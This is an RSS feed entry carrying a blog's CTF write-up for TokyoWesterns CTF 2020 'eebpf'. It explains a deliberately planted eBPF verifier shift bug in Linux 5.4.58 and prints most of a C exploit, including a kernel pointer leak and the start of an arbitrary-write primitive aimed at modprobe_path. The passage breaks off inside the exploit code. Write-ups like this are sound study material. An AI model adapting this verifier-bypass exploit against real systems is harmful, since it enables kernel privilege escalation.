<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>EBPF Verifier on Uniguri&#39;s Blog</title>
    <link>/tags/ebpf-verifier/</link>
    <description>Recent content in EBPF Verifier on Uniguri&#39;s Blog</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>en-us</language>
    <lastBuildDate>Tue, 28 Jan 2025 11:21:15 +0000</lastBuildDate><atom:link href="/tags/ebpf-verifier/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>TokyoWesternsCTF2020 eebpf</title>
      <link>/posts/kernel/write-ups/ctf/tokyowesternsctf2020-eebpf/</link>
      <pubDate>Tue, 28 Jan 2025 11:21:15 +0000</pubDate>
      
      <guid>/posts/kernel/write-ups/ctf/tokyowesternsctf2020-eebpf/</guid>
      <description>&lt;hr&gt;
&lt;h2 id=&#34;problem&#34;&gt;Problem&lt;/h2&gt;
&lt;h3 id=&#34;environment&#34;&gt;Environment&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;kernel version: &lt;code&gt;5.4.58&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;unprivileged_bpf_disabled: &lt;code&gt;0&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&#34;patch-file&#34;&gt;Patch file&lt;/h3&gt;
&lt;p&gt;The important part is the following:&lt;/p&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;594782631&#34; type=&#34;checkbox&#34;  /&gt;
    &lt;label for=&#34;594782631&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;diff&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;TokyoWesternsCTF2020-eebpf-patch.diff&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-diff&#34; &gt;
      &lt;code&gt;diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/include/uapi/linux/bpf.h buildroot-2020.08-rc3_original/output/build/linux-5.4.58/include/uapi/linux/bpf.h
27d26
&amp;lt; #define BPF_ALSH	0xe0	/* sign extending arithmetic shift left */
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/tnum.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/tnum.c
42,52d41
&amp;lt; struct tnum tnum_alshift(struct tnum a, u8 min_shift, u8 insn_bitness)
&amp;lt; {
&amp;lt; 	if (insn_bitness == 32)
&amp;lt; 		//Never reach here now.
&amp;lt; 		return TNUM((u32)(((s32)a.value) &amp;lt;&amp;lt; min_shift),
&amp;lt; 			    (u32)(((s32)a.mask)  &amp;lt;&amp;lt; min_shift));
&amp;lt; 	else
&amp;lt; 		return TNUM((s64)a.value &amp;lt;&amp;lt; min_shift,
&amp;lt; 			    (s64)a.mask  &amp;lt;&amp;lt; min_shift);
&amp;lt; }
&amp;lt; 
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/verifier.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/verifier.c
4867,4897d4866
&amp;lt; 	case BPF_ALSH:
&amp;lt; 		if (umax_val &amp;gt;= insn_bitness) {
&amp;lt; 			/* Shifts greater than 31 or 63 are undefined.
&amp;lt; 			 * This includes shifts by a negative number.
&amp;lt; 			 */
&amp;lt; 			mark_reg_unknown(env, regs, insn-&amp;gt;dst_reg);
&amp;lt; 			break;
&amp;lt; 		}
&amp;lt; 
&amp;lt; 		/* Upon reaching here, src_known is true and
&amp;lt; 		 * umax_val is equal to umin_val.
&amp;lt; 		 */
&amp;lt; 		if (insn_bitness == 32) {
&amp;lt; 			//Now we don&amp;#39;t support 32bit. Cuz im too lazy.
&amp;lt; 			mark_reg_unknown(env, regs, insn-&amp;gt;dst_reg);
&amp;lt; 			break;
&amp;lt; 		} else {
&amp;lt; 			dst_reg-&amp;gt;smin_value &amp;lt;&amp;lt;= umin_val;
&amp;lt; 			dst_reg-&amp;gt;smax_value &amp;lt;&amp;lt;= umin_val;
&amp;lt; 		}
&amp;lt; 
&amp;lt; 		dst_reg-&amp;gt;var_off = tnum_alshift(dst_reg-&amp;gt;var_off, umin_val,
&amp;lt; 						insn_bitness);
&amp;lt; 
&amp;lt; 		/* blow away the dst_reg umin_value/umax_value and rely on
&amp;lt; 		 * dst_reg var_off to refine the result.
&amp;lt; 		 */
&amp;lt; 		dst_reg-&amp;gt;umin_value = 0;
&amp;lt; 		dst_reg-&amp;gt;umax_value = U64_MAX;
&amp;lt; 		__update_reg_bounds(dst_reg);
&amp;lt; 		break;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;And the related locations are the following:&lt;/p&gt;</description>
      <content>&lt;hr&gt;
&lt;h2 id=&#34;problem&#34;&gt;Problem&lt;/h2&gt;
&lt;h3 id=&#34;environment&#34;&gt;Environment&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;kernel version: &lt;code&gt;5.4.58&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;unprivileged_bpf_disabled: &lt;code&gt;0&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&#34;patch-file&#34;&gt;Patch file&lt;/h3&gt;
&lt;p&gt;The important part is the following:&lt;/p&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;594782631&#34; type=&#34;checkbox&#34;  /&gt;
    &lt;label for=&#34;594782631&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;diff&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;TokyoWesternsCTF2020-eebpf-patch.diff&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-diff&#34; &gt;
      &lt;code&gt;diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/include/uapi/linux/bpf.h buildroot-2020.08-rc3_original/output/build/linux-5.4.58/include/uapi/linux/bpf.h
27d26
&amp;lt; #define BPF_ALSH	0xe0	/* sign extending arithmetic shift left */
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/tnum.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/tnum.c
42,52d41
&amp;lt; struct tnum tnum_alshift(struct tnum a, u8 min_shift, u8 insn_bitness)
&amp;lt; {
&amp;lt; 	if (insn_bitness == 32)
&amp;lt; 		//Never reach here now.
&amp;lt; 		return TNUM((u32)(((s32)a.value) &amp;lt;&amp;lt; min_shift),
&amp;lt; 			    (u32)(((s32)a.mask)  &amp;lt;&amp;lt; min_shift));
&amp;lt; 	else
&amp;lt; 		return TNUM((s64)a.value &amp;lt;&amp;lt; min_shift,
&amp;lt; 			    (s64)a.mask  &amp;lt;&amp;lt; min_shift);
&amp;lt; }
&amp;lt; 
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/verifier.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/verifier.c
4867,4897d4866
&amp;lt; 	case BPF_ALSH:
&amp;lt; 		if (umax_val &amp;gt;= insn_bitness) {
&amp;lt; 			/* Shifts greater than 31 or 63 are undefined.
&amp;lt; 			 * This includes shifts by a negative number.
&amp;lt; 			 */
&amp;lt; 			mark_reg_unknown(env, regs, insn-&amp;gt;dst_reg);
&amp;lt; 			break;
&amp;lt; 		}
&amp;lt; 
&amp;lt; 		/* Upon reaching here, src_known is true and
&amp;lt; 		 * umax_val is equal to umin_val.
&amp;lt; 		 */
&amp;lt; 		if (insn_bitness == 32) {
&amp;lt; 			//Now we don&amp;#39;t support 32bit. Cuz im too lazy.
&amp;lt; 			mark_reg_unknown(env, regs, insn-&amp;gt;dst_reg);
&amp;lt; 			break;
&amp;lt; 		} else {
&amp;lt; 			dst_reg-&amp;gt;smin_value &amp;lt;&amp;lt;= umin_val;
&amp;lt; 			dst_reg-&amp;gt;smax_value &amp;lt;&amp;lt;= umin_val;
&amp;lt; 		}
&amp;lt; 
&amp;lt; 		dst_reg-&amp;gt;var_off = tnum_alshift(dst_reg-&amp;gt;var_off, umin_val,
&amp;lt; 						insn_bitness);
&amp;lt; 
&amp;lt; 		/* blow away the dst_reg umin_value/umax_value and rely on
&amp;lt; 		 * dst_reg var_off to refine the result.
&amp;lt; 		 */
&amp;lt; 		dst_reg-&amp;gt;umin_value = 0;
&amp;lt; 		dst_reg-&amp;gt;umax_value = U64_MAX;
&amp;lt; 		__update_reg_bounds(dst_reg);
&amp;lt; 		break;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;And the related locations are the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/tnum.c#L42&#34;&gt;&lt;code&gt;tnum_alshift&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L4866&#34;&gt;Add verification routine to &lt;code&gt;adjust_scalar_min_max_vals&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&#34;vulnerability&#34;&gt;Vulnerability&lt;/h3&gt;
&lt;p&gt;As we can see, when we use &lt;code&gt;BPF_ALSH&lt;/code&gt;, &lt;code&gt;dst_reg-&amp;gt;smin_value &amp;lt;&amp;lt;= umin_val; dst_reg-&amp;gt;smax_value &amp;lt;&amp;lt;= umin_val;&lt;/code&gt; is executed.
And because type of &lt;code&gt;smin_value&lt;/code&gt; and &lt;code&gt;smax_value&lt;/code&gt; is &lt;code&gt;s64&lt;/code&gt;, we can make &lt;code&gt;smin_value &amp;gt; smax_value&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id=&#34;exploit&#34;&gt;Exploit&lt;/h2&gt;
&lt;h3 id=&#34;making-invalid-range&#34;&gt;Making invalid range&lt;/h3&gt;
&lt;p&gt;My step for making invalid range is following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Load element from bpf_map (we call it &lt;code&gt;e&lt;/code&gt;)
&lt;ol&gt;
&lt;li&gt;Its actual value is 1.&lt;/li&gt;
&lt;li&gt;Its tnum may be (.val=0, .mask=0xffffffffffffffff).&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;Do &lt;code&gt;e&lt;/code&gt; &amp;amp; 0x1fffffffffffffff.
&lt;ol&gt;
&lt;li&gt;Its actual value is 1.&lt;/li&gt;
&lt;li&gt;Its tnum may be (.val=0, .mask=0x1fffffffffffffff).&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;Do left shift to &lt;code&gt;e&lt;/code&gt; by 3.
&lt;ol&gt;
&lt;li&gt;Its actual value is 8.&lt;/li&gt;
&lt;li&gt;Its tnum may be (.val=0, .mask=0xfffffffffffffff8).&lt;/li&gt;
&lt;li&gt;Its min and max value is 0 and 0xfffffffffffffff8.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;Add 8 to &lt;code&gt;e&lt;/code&gt;.
&lt;ol&gt;
&lt;li&gt;Its actual value is 0x10.&lt;/li&gt;
&lt;li&gt;Its min and max value is 8 and 0.
&lt;ol&gt;
&lt;li&gt;Explained later.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;Add (.val=0, .mask=8; min=0, max=8) to &lt;code&gt;e&lt;/code&gt;.
&lt;ol&gt;
&lt;li&gt;Now &lt;code&gt;e&lt;/code&gt; has (actual_value, verification_value) = (0x10, 8).&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;Subtract 8 from &lt;code&gt;e&lt;/code&gt;.
&lt;ol&gt;
&lt;li&gt;Now &lt;code&gt;e&lt;/code&gt; has (act_val, veri_val) = (8, 0).&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h4 id=&#34;why-e8-does-make-min8-max0-&#34;&gt;Why does &lt;code&gt;e&lt;/code&gt;+=8 make min=8, max=0?&lt;/h4&gt;
&lt;p&gt;First, we check related functions (codes):&lt;/p&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;739216485&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;739216485&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;TokyoWesternsCTF2020-eebpf-addition_code_path.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// @ https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L4600
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
                                      struct bpf_insn *insn,
                                      struct bpf_reg_state *dst_reg,
                                      struct bpf_reg_state src_reg) {
    // ...

  case BPF_ADD:
    ret = sanitize_val_alu(env, insn);
    if (ret &amp;lt; 0) {
      verbose(env, &amp;#34;R%d tried to add from different pointers or scalars\n&amp;#34;,
              dst);
      return ret;
    }
    if (signed_add_overflows(dst_reg-&amp;gt;smin_value, smin_val) ||
        signed_add_overflows(dst_reg-&amp;gt;smax_value, smax_val)) {
      // ...
    } else {
      dst_reg-&amp;gt;smin_value += smin_val;
      dst_reg-&amp;gt;smax_value += smax_val;
    }
    if (dst_reg-&amp;gt;umin_value + umin_val &amp;lt; umin_val ||
        dst_reg-&amp;gt;umax_value + umax_val &amp;lt; umax_val) {
      dst_reg-&amp;gt;umin_value = 0;
      dst_reg-&amp;gt;umax_value = U64_MAX;
    } else {
      // ...
    }
    dst_reg-&amp;gt;var_off = tnum_add(dst_reg-&amp;gt;var_off, src_reg.var_off);
    break;

    // ...

    __reg_deduce_bounds(dst_reg);
    __reg_bound_offset(dst_reg);
    return 0;
}

// @ https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/tnum.c#L62
struct tnum tnum_add(struct tnum a, struct tnum b) {
  u64 sm, sv, sigma, chi, mu;

  sm = a.mask + b.mask;
  sv = a.value + b.value;
  sigma = sm + sv;
  chi = sigma ^ sv;
  mu = chi | a.mask | b.mask;
  return TNUM(sv &amp;amp; ~mu, mu);
}

// @ https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L939
/* Uses signed min/max values to inform unsigned, and vice-versa */
static void __reg_deduce_bounds(struct bpf_reg_state *reg) {
  /* Learn sign from signed bounds.
   * If we cannot cross the sign boundary, then signed and unsigned bounds
   * are the same, so combine.  This works even in the negative case, e.g.
   * -3 s&amp;lt;= x s&amp;lt;= -1 implies 0xf...fd u&amp;lt;= x u&amp;lt;= 0xf...ff.
   */
  if (reg-&amp;gt;smin_value &amp;gt;= 0 || reg-&amp;gt;smax_value &amp;lt; 0) {
    reg-&amp;gt;smin_value = reg-&amp;gt;umin_value =
        max_t(u64, reg-&amp;gt;smin_value, reg-&amp;gt;umin_value);
    reg-&amp;gt;smax_value = reg-&amp;gt;umax_value =
        min_t(u64, reg-&amp;gt;smax_value, reg-&amp;gt;umax_value);
    return;
  }

  // ...
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;When add 8 to &lt;code&gt;e&lt;/code&gt;, &lt;code&gt;e&lt;/code&gt; is (smin=umin=0, smax=umax=0xfffffffffffffff8; .val=0, .mask=0xfffffffffffffff8).
Since &lt;code&gt;signed_add_overflows(dst_reg-&amp;gt;smin_value, smin_val) || signed_add_overflows(dst_reg-&amp;gt;smax_value, smax_val)&lt;/code&gt; is false and &lt;code&gt;dst_reg-&amp;gt;umin_value + umin_val &amp;lt; umin_val || dst_reg-&amp;gt;umax_value + umax_val &amp;lt; umax_val&lt;/code&gt; is true, &lt;code&gt;dst_reg-&amp;gt;smin_value += smin_val; dst_reg-&amp;gt;smax_value += smax_val;&lt;/code&gt; and &lt;code&gt;dst_reg-&amp;gt;umin_value = 0; dst_reg-&amp;gt;umax_value = U64_MAX;&lt;/code&gt; are executed.
Then, &lt;code&gt;e&lt;/code&gt; is (smin=8, smax=0, umin=0, umax=U64_MAX).&lt;/p&gt;
&lt;p&gt;And return value of &lt;code&gt;tnum_add&lt;/code&gt; is (.val=0, .mask=0xfffffffffffffff8).
So after &lt;code&gt;dst_reg-&amp;gt;var_off = tnum_add(dst_reg-&amp;gt;var_off, src_reg.var_off);&lt;/code&gt;, &lt;code&gt;e&lt;/code&gt; is (smin=8, smax=0, umin=0, umax=U64_MAX; .val=0, .mask=0xfffffffffffffff8).&lt;/p&gt;
&lt;p&gt;But in &lt;code&gt;__reg_deduce_bounds&lt;/code&gt;, since &lt;code&gt;reg-&amp;gt;smin_value &amp;gt;= 0 || reg-&amp;gt;smax_value &amp;lt; 0&lt;/code&gt; is true, &lt;code&gt;reg-&amp;gt;smin_value = reg-&amp;gt;umin_value = max_t(u64, reg-&amp;gt;smin_value, reg-&amp;gt;umin_value);&lt;/code&gt; and &lt;code&gt;reg-&amp;gt;smax_value = reg-&amp;gt;umax_value = min_t(u64, reg-&amp;gt;smax_value, reg-&amp;gt;umax_value);&lt;/code&gt; are performed.
Because &lt;code&gt;reg-&amp;gt;smin_value == 8&lt;/code&gt;, &lt;code&gt;reg-&amp;gt;umin_value == 0&lt;/code&gt;, &lt;code&gt;reg-&amp;gt;smax_value == 0&lt;/code&gt; and &lt;code&gt;reg-&amp;gt;umax_value == U64_MAX&lt;/code&gt;, register&amp;rsquo;s min and max value is set by &lt;code&gt;reg-&amp;gt;?min_value = max_t(u64, 8, 0)&lt;/code&gt; and &lt;code&gt;reg-&amp;gt;?max_value = min_t(u64, 0, U64_MAX)&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;For these reasons, after &lt;code&gt;e&lt;/code&gt;+=8, &lt;code&gt;e&lt;/code&gt; will be (min=8, max=0).&lt;/p&gt;
&lt;h3 id=&#34;leak-struct-bpf_map-address&#34;&gt;Leak &lt;code&gt;struct bpf_map&lt;/code&gt; address&lt;/h3&gt;
&lt;p&gt;In &lt;code&gt;adjust_ptr_min_max_vals&lt;/code&gt; function, if &lt;code&gt;off_reg-&amp;gt;smin_value &amp;gt; off_reg-&amp;gt;smax_value&lt;/code&gt;, the pointer is marked as unknown.
And because the type of an unknown register is scalar, we can leak its value.&lt;/p&gt;
&lt;p&gt;See followings:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L4379&#34;&gt;https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L4379&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L999&#34;&gt;https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L999&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&#34;aaraaw-primitives&#34;&gt;AAR/AAW primitives&lt;/h3&gt;
&lt;p&gt;We can use the technique using &lt;code&gt;bpf_skb_load_bytes&lt;/code&gt; because of scalar which has invalid range.
Using this technique, we can set the value on the stack without verification by using an invalid &lt;code&gt;len&lt;/code&gt; argument.
Originally &lt;code&gt;bpf_skb_load_bytes&lt;/code&gt; changes values from &lt;code&gt;to&lt;/code&gt; to &lt;code&gt;to+len&lt;/code&gt;. So, the values are marked as unknown.
But with an invalid &lt;code&gt;len&lt;/code&gt;, we can set values that are marked as known (invalid verification).&lt;/p&gt;
&lt;p&gt;So, we can use this.&lt;/p&gt;
&lt;h3 id=&#34;exploit-code&#34;&gt;Exploit code&lt;/h3&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;276481593&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;276481593&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;TokyoWesternsCTF2020-eebpf-exploit.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define BPF_ALSH 0xe0

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81a0dec0 - KERNEL_BASE)
#define MODPROBE_OFFSET (0xffffffff81c2e800 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd;
uint64_t map_addr;
static uint64_t leak_bpf_map_addr(int do_print_verifier_log) {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &amp;amp;val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x8, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x8),
      // map_lookup_elem(mapfd, &amp;amp;key)
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_MOV64_REG(BPF_REG_5, BPF_REG_0),
      BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0),

      BPF_MOV64_REG(
          BPF_REG_0,
          BPF_REG_6),  // r0 = r6 == 0 == (.val=0, .mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_0,
                    1),  // r0 = r0 &amp;amp; 1 == 0 == (.val=0, .mask=1)
      BPF_ALU64_IMM(
          BPF_ALSH, BPF_REG_0,
          63),  // r0 = r0 &amp;lt;&amp;lt; 63 == 0 == (.val=0, .mask=0x8000000000000000);
      // smin=0, smax=0x8000000000000000

      BPF_MOV64_REG(BPF_REG_1, BPF_REG_5),  // r1 = r5 == map_elem
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_0),  // r1 = r1 + r0; Because r0&amp;#39;s smin &amp;gt; s0&amp;#39;s smax,
                                 // r1 will be marked as unknown.
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_1),

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x8, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x8),
      // arg3(&amp;amp;val)
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x10),
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, BPF_ANY),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s&amp;#34;, verifier_log);
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  // Trigger the BPF program
  write(socks[1], &amp;#34;UNIGURI&amp;#34;, 7);

  bpf_map_lookup(mapfd, 0, &amp;amp;val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  if (do_print_verifier_log) {
    puts(&amp;#34;============[verifier log]============&amp;#34;);
    printf(&amp;#34;%s&amp;#34;, verifier_log);
    puts(&amp;#34;============[verifier log]============&amp;#34;);
  }

  return val - 0xd0;
}

static void aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x8),

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // map_lookup_elem(mapfd, &amp;amp;key)
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_MOV64_REG(BPF_REG_5, BPF_REG_0),           // r5 = map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0),  // r6 = *map_elem == 1

      BPF_MOV64_REG(
          BPF_REG_0,
          BPF_REG_6),  // r0 = r6 == (.val=0, .mask=0xffffffffffffffff)
      BPF_MOV64_IMM(BPF_REG_1, -1),  // r1 = 0xffffffffffffffff
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    3),  // r1 = r1 &amp;gt;&amp;gt; 3 == 0x1fffffffffffffff
      BPF_ALU64_REG(BPF_AND, BPF_REG_0,
                    BPF_REG_1),  // r0 = r0 &amp;amp; r1 == (actual_val=1; .val=0,
                                 // .mask=0x1fffffffffffffff)
      BPF_ALU64_IMM(BPF_ALSH, BPF_REG_0,
                    3),  // r0 = r0 &amp;lt;&amp;lt; 3 == (actual_val=8; .val=0,
                         // .mask=0xfffffffffffffff8;
                         // umin=0, umax=0xfffffffffffffff8)
      BPF_ALU64_IMM(
          BPF_REG_0, BPF_ADD,
          8),  // r0 = r0 + 8 == (actual_val=0x10; .val=0, .mask=0x8; umin=0x8,
               // umax=0). Because of integer overflow in umax.
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),  // r1 = r6 == [map_elem]
      BPF_ALU64_IMM(
          BPF_AND, BPF_REG_1,
